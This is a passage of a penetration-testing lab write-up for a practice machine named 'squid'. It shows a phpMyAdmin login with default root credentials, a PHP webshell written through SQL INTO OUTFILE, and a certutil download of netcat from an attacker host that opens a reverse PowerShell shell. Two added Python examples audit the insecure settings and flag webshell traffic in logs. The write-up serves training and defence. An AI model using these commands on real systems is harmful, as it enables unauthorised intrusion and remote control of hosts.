phpMyAdmin


Leveraging the Squid HTTP proxy instance, I was able to discover a WampServer instance running on the internal port 8080, which bundles various default software, including a phpMyAdmin instance with default credentials. Since SQL queries can be executed directly from the web GUI of the target phpMyAdmin instance with the highest privileges, as the root account, I can get code execution on the target system by writing a malicious PHP file to a web-accessible location.

SELECT '<?php echo system($_GET["cmd"]); ?>' INTO OUTFILE 'C:\\wamp\\www\\webshell.php'

Writing a webshell to the accessible location.
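The write above succeeds only because two defaults line up: MySQL's secure_file_priv places no restriction on where INTO OUTFILE may write, and phpMyAdmin accepts the root account with an empty password. The following audit script is an added example for defenders, not part of the original write-up or of WampServer; it parses a constructed my.ini and a constructed config.inc.php (both invented here, not copied from the target) and reports the settings that make this attack path possible. The web root path is an assumed default.

```python
import re

# Constructed sample of a WampServer-style my.ini (not taken from any real host).
SAMPLE_MY_INI = """
[mysqld]
port = 3306
datadir = C:/wamp/bin/mysql/mysql5.7.14/data
secure_file_priv =
"""

# Constructed sample of a phpMyAdmin config.inc.php with the weak default settings.
SAMPLE_PMA_CONFIG = """
<?php
$i = 0;
$i++;
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = '';
$cfg['Servers'][$i]['AllowNoPassword'] = true;
"""


def audit_mysql_config(ini_text, web_root="C:/wamp/www"):
    """Return findings about secure_file_priv in a my.ini / my.cnf text.

    secure_file_priv semantics (MySQL / MariaDB):
      NULL         -> LOAD DATA INFILE and SELECT ... INTO OUTFILE disabled entirely
      <directory>  -> file reads/writes restricted to that directory
      empty/unset  -> files may be written anywhere the server process can write
    web_root is an assumed default used to check whether a restricted directory
    is still reachable over HTTP.
    """
    findings = []
    in_mysqld = False
    value = None
    for raw in ini_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        if line.startswith("["):
            in_mysqld = line.lower() == "[mysqld]"
            continue
        if not in_mysqld or "=" not in line:
            continue
        key, _, val = line.partition("=")
        # MySQL accepts both secure_file_priv and secure-file-priv spellings.
        if key.strip().lower().replace("-", "_") == "secure_file_priv":
            value = val.strip().strip("\"'")
    if value is None:
        findings.append("secure_file_priv not set: INTO OUTFILE may write to any server-writable path")
    elif value == "":
        findings.append("secure_file_priv is empty: INTO OUTFILE may write to any server-writable path")
    elif value.upper() != "NULL":
        norm = value.replace("\\", "/").rstrip("/").lower()
        root = web_root.replace("\\", "/").rstrip("/").lower()
        if norm == root or norm.startswith(root + "/"):
            findings.append(f"secure_file_priv points inside the web root ({value}): written files are web-reachable")
    return findings


def audit_phpmyadmin_config(php_text):
    """Return findings about authentication settings in a phpMyAdmin config.inc.php text."""
    findings = []
    if re.search(r"\['auth_type'\]\s*=\s*'config'", php_text):
        findings.append("auth_type 'config': credentials are stored in config.inc.php and no login is required")
    if re.search(r"\['AllowNoPassword'\]\s*=\s*true", php_text, re.IGNORECASE):
        findings.append("AllowNoPassword is true: accounts with an empty password (e.g. default root) can log in")
    m = re.search(r"\['password'\]\s*=\s*'(.*?)'", php_text)
    if m and m.group(1) == "":
        findings.append("stored MySQL password is empty")
    return findings


if __name__ == "__main__":
    for f in audit_mysql_config(SAMPLE_MY_INI) + audit_phpmyadmin_config(SAMPLE_PMA_CONFIG):
        print("FINDING:", f)
```

A clean result from both functions corresponds to secure_file_priv=NULL (or a directory outside the web root), cookie-based phpMyAdmin authentication, and a non-empty root password; with any of those in place the INTO OUTFILE step above either fails or lands the file somewhere Apache will not serve.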

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/squid]
└─$ curl -x http://$IP:3128 -s http://$IP:8080/webshell.php?cmd=whoami
nt authority\local service

Code execution confirmed.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/squid]
└─$ cmd=$(echo 'mkdir C:\\tmp && certutil.exe -urlcache -split -f http://192.168.45.157/nc64.exe C:\\tmp\\nc64.exe && C:\\tmp\\nc64.exe 192.168.45.157 9999 -e powershell' | urlencode) ; curl -x http://$IP:3128 -s http://$IP:8080/webshell.php?cmd=$cmd

Downloading the Netcat binary and executing it.
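Every step above leaves a distinctive trace in the web server's access log: a PHP file receiving a cmd parameter, shell tokens in the query string, and (because the requests arrive through Squid on the same host) a loopback source address. The detector below is an added example written from the defender's side, not code from the original write-up; it runs over constructed Apache combined-format log lines (IPs, timestamps and paths invented here) and flags requests consistent with webshell use.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache "combined" format lines; addresses and paths are invented for this example.
SAMPLE_ACCESS_LOG = [
    '127.0.0.1 - - [10/Oct/2023:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '127.0.0.1 - - [10/Oct/2023:10:00:05 +0000] "GET /webshell.php?cmd=whoami HTTP/1.1" 200 32 "-" "curl/7.88.1"',
    '127.0.0.1 - - [10/Oct/2023:10:00:09 +0000] "GET /webshell.php?cmd=mkdir%20C%3A%5C%5Ctmp%20%26%26%20certutil.exe%20-urlcache HTTP/1.1" 200 0 "-" "curl/7.88.1"',
    '192.168.1.20 - - [10/Oct/2023:10:01:00 +0000] "POST /phpmyadmin/import.php HTTP/1.1" 200 5000 "-" "Mozilla/5.0"',
]

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Parameter names typical of one-line PHP webshells, and tokens that indicate a
# shell command rather than ordinary application data.
SUSPICIOUS_PARAMS = {"cmd", "exec", "command", "c"}
COMMAND_TOKENS = ("certutil", "powershell", "cmd.exe", "nc64", "nc.exe", "whoami", "&&", "|")


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def score_request(entry):
    """Return the reasons this request looks like webshell use (empty list if benign)."""
    reasons = []
    parts = urlsplit(entry["target"])
    is_php = parts.path.lower().endswith(".php")
    params = parse_qs(parts.query, keep_blank_values=True)  # parse_qs percent-decodes values
    for name, values in params.items():
        if is_php and name.lower() in SUSPICIOUS_PARAMS:
            reasons.append(f"php script called with shell-style parameter '{name}'")
            for v in values:
                decoded = v.lower()
                hits = [t for t in COMMAND_TOKENS if t in decoded]
                if hits:
                    reasons.append("command tokens in value: " + ", ".join(hits))
    if entry["src"].startswith("127.") and is_php and params:
        reasons.append("loopback source with parameters: consistent with traffic relayed through a local proxy")
    return reasons


def detect_webshell_activity(lines):
    """Return (timestamp, request target, reasons) for every line that scores."""
    alerts = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = score_request(entry)
        if reasons:
            alerts.append((entry["ts"], entry["target"], reasons))
    return alerts


if __name__ == "__main__":
    for ts, target, reasons in detect_webshell_activity(SAMPLE_ACCESS_LOG):
        print(ts, target)
        for r in reasons:
            print("   -", r)
```

The loopback heuristic only makes sense where the proxy and the web server share a host, as they do here; on a split deployment the source to look for is the proxy's own address hitting ports that were never meant to be published through it.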

Hit

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/squid]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [192.168.45.157] from (UNKNOWN) [192.168.135.189] 49775
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.
 
PS C:\wamp\www> whoami
whoami
nt authority\local service
PS C:\wamp\www> hostname
hostname
SQUID
PS C:\wamp\www> ipconfig
ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.135.189
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.135.254

Initial foothold established on the target system as the local service account by exploiting the phpMyAdmin instance.